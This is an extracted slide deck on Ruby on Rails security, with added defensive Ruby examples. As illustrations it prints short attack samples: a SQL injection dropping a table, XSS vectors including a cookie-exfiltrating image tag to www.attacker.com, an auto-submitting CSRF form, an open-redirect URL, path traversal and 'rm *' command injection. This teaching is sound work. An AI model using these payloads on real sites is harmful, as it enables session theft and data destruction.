2. About Me
• a.k.a. ihower
• http://ihower.tw
• http://twitter.com/ihower
• http://github.com/ihower
• Ruby on Rails developer since 2006
• Ruby Taiwan Community
• http://ruby.tw
3. Defense in Depth
• Network: firewalls, IDS
• Operating system
• Web server
• Web application
• Database
4. 75% of attacks are at the web application layer
(Gartner Group estimate)
5. What is Security?
• a measurement, not a characteristic
• not a simple requirement to be met...
• must be balanced with expense
• it's easy and relatively inexpensive to provide a sufficient level of security for most applications. But if you need more...
• must be balanced with usability
• measures that increase security often decrease usability...
• must be part of the design
(from PHP Security Guide: Overview)
6. Okay, your users are evil:
they will send you illegitimate operations and data.
10. Web and Application Server?
• Server header
• apache
• nginx
• mongrel
• mod_rails
11. Disable Server Header
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch Phusion_Passenger/2.2.9
# apache2.conf
ServerSignature Off
ServerTokens Prod
# response header after the change:
Server: Apache
12. SVN metadata
• GET http://your_site.org/.svn/entries
(a checked-out .svn directory reveals file names, revisions and the repository URL)
<DirectoryMatch "^/.*/.svn/">
  ErrorDocument 403 /404.html
  Order allow,deny
  Deny from all
  Satisfy All
</DirectoryMatch>
Or just delete it:
http://plog.longwin.com.tw/my_note-unix/2008/01/07/find_delete_svn_directory_2008
13. Sensitive Information
• Do not store sensitive information in the clear in:
• cookie
• session (or flash)
• memory for a long time
• log files
• cache
15. Cookie Session Storage
# config/initializers/session_store.rb
ActionController::Base.session = {
  :key => '_app_session',
  :secret => '0x0dkfj3927dkc7djdh36rkckdfzsg...'
}
• Don't use a trivial secret: the secret only signs the cookie, and a guessable secret lets anyone forge a session
• Don't store any secret information here: the cookie is signed, not encrypted, so the user (and anyone who sees the cookie) can read its contents
• Or.... just switch to another session storage
16. Session
The session id is a 32-character hex MD5 hash of a random value.
• Hijacking
• Fixation
• call reset_session after every login, so a session id planted by an attacker is never promoted to an authenticated session
17. SQL injection
x'; DROP TABLE users; --
Project.find(:all, :conditions => "name = '#{params[:name]}'")
SELECT * FROM projects WHERE name = 'x'; DROP TABLE users; --'
18. SQL injection
vulnerabilities:
• find_by_sql
• execute
• find with conditions in a string
• limit and offset (before Rails 2.1.1)
• group_by
• order
19. Always use the hash or array form
Project.find(:all, :conditions => { :name => params[:name] } )
# or
Project.find(:all, :conditions => ["name = ?", params[:name] ] )
20. Only allow predefined values
class User < ActiveRecord::Base
  def self.find_with_order(order)
    raise "SQL Injection Warning" unless ["id","id desc"].include?(order)
    find(:all, :limit => 1, :order => order )
  end
end
21. Use quote if you need to pass a value directly
ActiveRecord::Base.connection.quote
class User < ActiveRecord::Base
  def self.find_with_order(order)
    find(:all, :order => connection.quote(order) )
  end
end
Caveat: quote() escapes a value and wraps it in single quotes, so it is the right tool for values in a WHERE clause. In an ORDER BY clause the result is a string constant ('id desc') rather than a column name, so depending on the database the sort is a no-op or an error; for column names and sort directions use the whitelist from the previous slide.
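To see why the array form on slide 19 defeats the payload on slide 17, and why ORDER BY needs the whitelist from slide 20 instead, here is an added example. It is not ActiveRecord's implementation; quote_value and build_conditions are a small imitation of the "?" placeholder mechanism (SQL-standard quote doubling only; real adapters add database-specific rules such as MySQL backslash escapes), and ALLOWED_ORDERS is the whitelist from slide 20.

```ruby
# Added example, not ActiveRecord's code: a minimal "?" placeholder builder.
PAYLOAD = "x'; DROP TABLE users; --"   # the slide's injection string

# Slide 17: string interpolation, the value becomes part of the SQL grammar.
def unsafe_conditions(name)
  "name = '#{name}'"
end

# Quote one value as an SQL literal. Doubling a single quote is the SQL
# standard escape; database adapters layer their own rules on top.
def quote_value(value)
  case value
  when nil then 'NULL'
  when Integer then value.to_s
  else "'#{value.to_s.gsub("'", "''")}'"
  end
end

# Slide 19: each "?" is replaced by a quoted literal, so user text can never
# close the quote it sits inside. Values are never re-scanned for "?".
def build_conditions(template, *values)
  parts = template.split('?', -1)
  unless parts.size - 1 == values.size
    raise ArgumentError, "expected #{parts.size - 1} values, got #{values.size}"
  end
  parts.zip(values.map { |v| quote_value(v) } + ['']).flatten.join
end

# Slide 20: ORDER BY cannot be quoted as a value, so allow only known clauses.
ALLOWED_ORDERS = ['id', 'id desc'].freeze

def safe_order(order)
  unless ALLOWED_ORDERS.include?(order)
    raise ArgumentError, "SQL Injection Warning: #{order.inspect}"
  end
  order
end
```

With the payload, unsafe_conditions yields `name = 'x'; DROP TABLE users; --'` (two statements), while build_conditions yields `name = 'x''; DROP TABLE users; --'`, a single comparison against a harmless string.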
22. Mass assignment
def create
  params[:user] #=> {:name => 'ow3ned', :is_admin => true}
  @user = User.create(params[:user])
end
def update
  @user = User.find(params[:id])
  @user.update_attributes(params[:user])
end
Every key in params[:user] becomes an attribute, so a user who adds is_admin=true to the submitted form promotes themselves.
23. Protect it!
class User < ActiveRecord::Base
  attr_protected :is_admin
end
# or (preferred: a whitelist is complete by construction)
class User < ActiveRecord::Base
  attr_accessible :name
end
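What attr_accessible does is easy to lose behind the ActiveRecord machinery, so here is the whitelist idea as an added, stand-alone example (not ActiveRecord's code): a plain Ruby mixin with a hypothetical User class that declares only name as assignable, fed the exact params from slide 22.

```ruby
# Added example, not ActiveRecord's implementation: a whitelist mixin.
module AttributeWhitelist
  def self.included(base)
    base.extend(ClassMethods)
  end

  module ClassMethods
    # Declare the only attributes that mass assignment may touch.
    def attr_accessible(*names)
      @accessible_attributes = names.map(&:to_s)
    end

    def accessible_attributes
      @accessible_attributes || []
    end
  end

  # Assign whitelisted keys; return the keys that were dropped (worth logging,
  # since a dropped is_admin is a sign someone is probing the form).
  def assign_attributes(params)
    rejected = []
    params.each do |key, value|
      if self.class.accessible_attributes.include?(key.to_s)
        instance_variable_set("@#{key}", value)
      else
        rejected << key.to_s
      end
    end
    rejected
  end
end

# Hypothetical model for the demo.
class User
  include AttributeWhitelist
  attr_reader :name, :is_admin
  attr_accessible :name            # is_admin is deliberately not listed

  def initialize(params = {})
    @is_admin = false
    assign_attributes(params)
  end
end
```

User.new('name' => 'ow3ned', 'is_admin' => true) ends up with is_admin still false; the extra key is reported back rather than silently applied.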
25. Unscoped finds
class UserOrdersController < ApplicationController
  # any user can view any order just by changing :id
  def show
    @order = Order.find(params[:id])
  end
  # scoped through the association: an order belonging to someone else
  # raises RecordNotFound instead of being shown
  def show
    @order = current_user.orders.find(params[:id])
  end
end
26. Controller: exposed methods
• Use protected and private; every public method of a controller is a routable action
• If you use RESTful design, do not keep the default routes (map.connect ':controller/:action/:id')
• http://ihower.tw/blog/archives/3265
27. XSS (Cross-Site Scripting)
Malicious users inject client-side script into web pages viewed by other users.
<script>alert('HACK YOU!');</script>
<img src=javascript:alert('HACK YOU!')>
<table background="javascript:alert('HACK YOU!')">
<script>document.write(document.cookie);</script>
<script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>
• Don't try to build a black-list; you can find many more vectors at http://ha.ckers.org/xss.html
28. XSS Protection (Rails 2)
• Use the escapeHTML() method (or its alias h())
• Plugins
• http://github.com/nzkoz/rails_xss (for Rails 2.3)
• http://agilewebdevelopment.com/plugins/safe_erb
• http://code.google.com/p/xss-shield/ (tainting approach)
29. XSS Protection (Rails 3)
• Rails 3 auto-escapes strings
• Unless you mark the string html_safe or use raw
• "<p>safe</p>".html_safe
• raw("<p>safe</p>")
30. Allow users to use simple HTML
• Use the white-list sanitize() method
• If you use a Textile or Markdown markup language, you still need to sanitize the output: the generated HTML can carry user-supplied tags and attributes
31. CSRF
Cross-Site Request Forgery
Using another user's authorization (the session cookie the browser sends automatically) to interact with a web application as that trusted user in a malicious way.
32. CSRF protection (1)
• Use GET requests for safe operations such as a query, read operation, or lookup
• Use POST requests for any destructive actions such as create, update, delete
33. But...
• POST requests can be sent automatically, too. An example:
<a href="http://www.harmless.com/" onclick="
  var f = document.createElement('form');
  f.style.display = 'none';
  this.parentNode.appendChild(f);
  f.method = 'POST';
  f.action = 'http://www.example.com/account/destroy';
  f.submit();
  return false;">To the harmless survey</a>
34. CSRF protection (2)
protect_from_forgery checks every non-GET request (POST, PUT, DELETE) for a security token tied to the session, which the attacker's page cannot read
class ApplicationController < ActionController::Base
  protect_from_forgery
end
<form action="/projects/1" class="edit_project" enctype="multipart/form-data" id="edit_project_1" method="post">
  <div style="margin:0;padding:0;display:inline">
    <input name="_method" type="hidden" value="put" />
    <input name="authenticity_token" type="hidden" value="cuI+ljBAcBxcEkv4pbeqLTEnRUb9mUYMgfpkwOtoyiA=" />
  </div>
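The check behind protect_from_forgery is small enough to show whole. The block below is an added example, not Rails' implementation: a per-session random token, emitted into forms as the hidden authenticity_token field above and compared in constant time on every non-GET request. The session is a plain Hash and the request is represented by its method and params, both constructed for the demo.

```ruby
require 'securerandom'

# Added example, not Rails' protect_from_forgery.
SAFE_METHODS = %w[GET HEAD].freeze

# One token per session, created on first use. It lives only in the session
# and in forms we render, so a page on another origin never learns it.
def csrf_token(session)
  session['_csrf_token'] ||= SecureRandom.base64(32)
end

# Constant-time comparison so the token cannot be guessed byte by byte.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# True when the request may proceed: safe method, or a matching token.
def verified_request?(session, method, params)
  return true if SAFE_METHODS.include?(method.to_s.upcase)
  submitted = params['authenticity_token']
  return false if submitted.nil? || session['_csrf_token'].nil?
  secure_compare(submitted.to_s, session['_csrf_token'])
end

# The hidden field from slide 34.
def hidden_token_field(session)
  %(<input name="authenticity_token" type="hidden" value="#{csrf_token(session)}" />)
end
```

The forged form on slide 33 submits without a token (or with one it guessed), so verified_request? returns false for it; the application's own forms carry the session's token and pass. Keep the token out of GET URLs and logs, since anything that leaks it defeats the check.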
35. Redirection
Do not let the user supply (parts of) the URL for a redirection directly
def legacy
  redirect_to(params.update(:action=>'main'))
end
http://www.example.com/site/legacy?param1=xy&param2=23&host=www.attacker.com
The whole params hash is handed to url_for, so the attacker's host parameter overrides the host of the generated URL and the user is sent to www.attacker.com.
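Where a redirect target genuinely must come from the request (a "return to" parameter after login, say), validate it instead of passing it through. The block below is an added example, not code from the slides: it accepts local paths and full URLs on an explicit host allowlist and falls back to a fixed path for everything else, including the tricks that a naive "starts with /" or "contains example.com" check misses. ALLOWED_REDIRECT_HOSTS is constructed from the slide's own host.

```ruby
require 'uri'

# Added example: allowlist-based redirect target validation.
ALLOWED_REDIRECT_HOSTS = %w[www.example.com].freeze  # constructed for the demo

def safe_redirect_target(target, fallback = '/')
  return fallback if target.nil? || target.empty?
  uri = URI.parse(target)
  if uri.host.nil?
    # "javascript:..." and "mailto:..." have a scheme but no host: refuse.
    return fallback unless uri.scheme.nil?
    # Keep plain local paths. "//host/x" is parsed with a host and so never
    # reaches this branch; the explicit check covers the bare "//" case.
    return fallback unless target.start_with?('/') && !target.start_with?('//')
    return target
  end
  # Absolute URL: only http(s) and only to hosts we own. A userinfo trick such
  # as http://www.example.com@www.attacker.com/ parses with the attacker's host.
  return fallback unless %w[http https].include?(uri.scheme)
  ALLOWED_REDIRECT_HOSTS.include?(uri.host.downcase) ? target : fallback
rescue URI::InvalidURIError
  fallback
end
```

Use the returned value in redirect_to rather than the raw parameter; a malformed URL is treated the same as a hostile one and goes to the fallback.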
36. File Uploads: Overwrite
• Make sure file uploads don't overwrite important files, e.g. a file name of "../../../etc/passwd"
• Validate that the file name is simple. Don't try to remove malicious parts; reject the name instead.
• Use plugins: attachment_fu or paperclip
37. File Uploads: Executable
• Never allow users to upload any extension associated with executable content on your site (.php, .cgi, etc.)
• When a user downloads a file, set the appropriate Content-Type HTTP header to eliminate the potential for XSS attacks (a browser rendering an uploaded file as HTML)
• Or keep uploaded files where the web server cannot serve them directly (outside the DocumentRoot in Apache)
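The two file-upload slides amount to one routine: accept only a simple name with an allowlisted extension, and serve it back with a Content-Type that cannot be rendered as a page. The block below is an added example, not code from attachment_fu or paperclip; the extension allowlist and content-type table are constructed for the demo and would be tailored to what an application actually accepts.

```ruby
# Added example: validate upload names, never "clean" them.
ALLOWED_EXTENSIONS = %w[jpg jpeg png gif pdf].freeze        # constructed list

# One run of safe characters, one dot, one short extension; \A and \z anchor
# the whole name, so "../x.jpg", "shell.php.jpg" and "x.jpg\n.php" all fail.
SIMPLE_NAME = /\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})\z/

def safe_upload_name(filename)
  return nil if filename.nil?
  m = SIMPLE_NAME.match(filename)
  return nil unless m
  ALLOWED_EXTENSIONS.include?(m[1].downcase) ? filename : nil
end

# Only ever join a validated name onto the upload directory.
def upload_path(upload_dir, filename)
  name = safe_upload_name(filename)
  name.nil? ? nil : File.join(upload_dir, name)
end

# Slide 37: serve downloads with an explicit type and as an attachment, so a
# file that happens to contain HTML is never rendered in the site's origin.
CONTENT_TYPES = {
  'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png',
  'gif' => 'image/gif', 'pdf' => 'application/pdf'
}.freeze

def download_headers(filename)
  ext = File.extname(filename).delete('.').downcase
  {
    'Content-Type' => CONTENT_TYPES.fetch(ext, 'application/octet-stream'),
    'Content-Disposition' => %(attachment; filename="#{filename}"),
    'X-Content-Type-Options' => 'nosniff'
  }
end
```

Rejecting rather than rewriting keeps the rule simple to audit: anything that does not match the regex never reaches the filesystem, and the traversal payload from slide 36 is refused outright.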
39. Command Line Injection
system("/bin/echo","hello; rm *")
# prints "hello; rm *" and does not delete files
The multi-argument form hands each argument straight to the program without a shell, so ";" is just a character; the single-string form system("/bin/echo #{input}") goes through /bin/sh and would run rm.
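The difference is easiest to believe when both forms run on the same input. The block below is an added example, not from the slides: the same payload goes through the shell form, the argv form, and a shell form with Shellwords escaping. It uses echo and a harmless payload constructed for the demo, so the "injection" only prints an extra line instead of deleting anything.

```ruby
require 'shellwords'
require 'open3'

# Added example. Constructed payload: visible when injected, harmless otherwise.
INPUT = 'hello; echo INJECTED'

# Shell form: the string is handed to /bin/sh, so ';' starts a second command.
# Never do this with user input.
def echo_via_shell(text)
  Open3.capture2("echo #{text}").first
end

# argv form: no shell is involved; the whole string is a single argument.
def echo_via_argv(text)
  Open3.capture2('echo', text).first
end

# If a shell is unavoidable (pipes, redirects), escape each argument first.
def echo_via_escaped_shell(text)
  Open3.capture2("echo #{Shellwords.escape(text)}").first
end
```

Only the shell form prints two lines; prefer the argv form, and treat Shellwords.escape as the fallback for the cases where shell syntax is genuinely needed.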
40. Denial-of-service attacks (DoS)
• Avoid long-running actions; use background processing.
• Don't bother your application server:
• let the web server serve static files
• use an HTTP reverse proxy if needed
41. Host
• Platform (Windows, Linux, Solaris, BSDs): choose one you can trust and are familiar with
• Firewall: use nmap to show which ports are open
• SSH: move port 22 to another port
• Turn off any services that you aren't using.
• Hire a system administrator to help
Your time as a developer should be spent on the things you are good at.
43. Fail Close
# fail open way, it's bad: anything not explicitly redirected falls through to the show view
def show
  @invoice = Invoice.find(params[:id])
  unless @user.validate_code( @invoice.code )
    redirect_to :action => 'not_authorized'
  end
end
# fail close way: the authorized branch is the explicit one
def show
  @invoice = Invoice.find(params[:id])
  if @user.validate_code( @invoice.code )
    redirect_to :action => 'authorized'
  else
    redirect_to :action => 'not_authorized'
  end
end
44. Whitelisting
Use a whitelist; a blacklist is hardly ever complete
admins = %w{ihower ihover}   # %w, not %{}: a plain string would make include? a substring match
# fail close way
if admins.include? user
  redirect_to :action => 'authorized'
else
  redirect_to :action => 'not_authorized'
end
# fail open way, don't do this
if !admins.include? user
  redirect_to :action => 'not_authorized'
else
  redirect_to :action => 'authorized'
end
45. Conclusion
• Rails has many security features enabled by default
• SQL quoting
• HTML sanitization
• CSRF protection
46. Reference
• Agile Web Development with Rails, 3rd ed., Chap. 27 "Securing Your Rails Application" (Pragmatic)
• Rails 2, Chap. 13 "Security and Performance Enhancements" (friendsof)
• Advanced Rails, Chap. 5 "Security" (O'Reilly)
• Security Audit by Aaron Bedra (Peepcode)
• Security on Rails (Pragmatic)
• PHP Security Guide
• http://blog.innerewut.de/2009/11/3/ruby-en-rails-2009-recap
• http://guides.rubyonrails.org/security.html
• http://www.rorsecurity.info
• http://asciicasts.com/episodes/178-seven-security-tips
• http://www.ultrasaurus.com/sarahblog/2010/01/rails-security-review-checklist/
• http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
• http://www.owasp.org